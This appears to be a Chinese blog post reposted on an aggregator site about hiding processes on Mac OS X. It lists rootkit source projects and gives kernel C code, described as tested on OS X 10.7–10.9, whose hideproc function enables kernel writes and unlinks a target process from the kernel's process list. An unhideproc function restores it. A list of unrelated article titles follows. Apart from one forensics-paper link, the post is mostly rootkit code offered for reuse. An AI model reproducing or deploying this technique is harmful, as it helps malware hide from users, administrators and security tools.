Mac OS X 隐藏进程相关资料
来源:互联网 发布:手机桌面计时器软件 编辑:程序博客网 时间:2024/05/22 09:42
http://forensic.n0fate.com/wp-content/uploads/2012/12/Hunting-Mac-OS-X-rootkit-with-Memory-Forensics.pdf
参考codes:
frasm-master.zip
inficere-master.zip
onyx-the-black-cat-master.zip
rubilyn-0.0.1.tar.gz
KernelResolver-master
等等 Google、github上的资源
关键代码:作参考吧 亲测支持10.7-10.9
int hideproc(int pid){ if ( pid <= 0 ) { return -1; } if (init_kernel_info(&g_kernel_info_hide_proc) != KERN_SUCCESS) { return KERN_FAILURE; } // IOLog("\nHide Proc!!!\n"); if(string_handler()==0) { struct proc* p; if(pid!=0) { for (p = my_allproc->lh_first; p != 0; p = p->p_list.le_next) { if(pid == p->p_pid) { if(hidden_p_count < MAX_HIDDEN_PROCESS) { // 记录该进程 hidden_p[hidden_p_count]=p; hidden_p_count++; // 隐藏该进程 enable_kernel_write(); my_proc_list_lock(); LIST_REMOVE(p, p_list); my_proc_list_unlock(); disable_kernel_write(); return 1; } } } } } return 0;}/* put the proc back via deceptikom */int unhideproc(int pid){ struct proc* p; int count; if(pid!=0){ if(hidden_p_count > 0) { for(count = 0;count < hidden_p_count;count++) // 1t { p = hidden_p[count]; enable_kernel_write_v2(); my_proc_list_lock(); LIST_INSERT_HEAD(my_allproc,p,p_list); my_proc_list_unlock(); disable_kernel_write_v2(); hidden_p_count--; } } } return 0;} 0 0
- Mac OS X 隐藏进程相关资料
- Mac OS X进程隐藏后 关机卡住问题
- Mac OS X隐藏文件
- MAC OS相关知识资料
- Mac OS X环境变量相关
- 显示MAC OS X隐藏目录
- mac os x显示隐藏文件
- mac os x显示隐藏文件
- Mac OS X 显示隐藏文件
- MAC OS X 显示所有隐藏文件
- Mac os x 显示隐藏文件方法
- Mac OS X 桌面图标隐藏和显示
- mac os x 隐藏或显示文件
- Mac OS X下显示/隐藏文件
- Mac OS X 如何查看隐藏文件
- Mac OS X下面相关快捷键
- Mac OS X 分区相关操作
- Mac OS X: 网络管理Login Script来隐藏程序
- 程序员的十层楼
- 文章排版中的实用CSS基础
- 登录 验证码的实现 --代码
- C语言:将16进制字符串转化为int类型值
- python解析网页中javascript动态添加的内容 一
- Mac OS X 隐藏进程相关资料
- 记一次失败的尝试--ubuntu下把笔记本无线网卡的驱动替换掉
- iOS开发之bug记录1
- MAC OS X 下常用工具
- Cocos2D-X2.2.3学习笔记6(UI系统)
- 第十二周 项目1 项目1 - 长颈鹿类对动物类的继承
- 新辰:对个人站长职业前景的探讨之路在何方?
- 【进程管理】进程三部曲:创建,执行与消亡(综述)
- Incorrect NSStringEncoding value 0x0000 detected. Assuming NSASCIIStringEncoding. Will stop this co
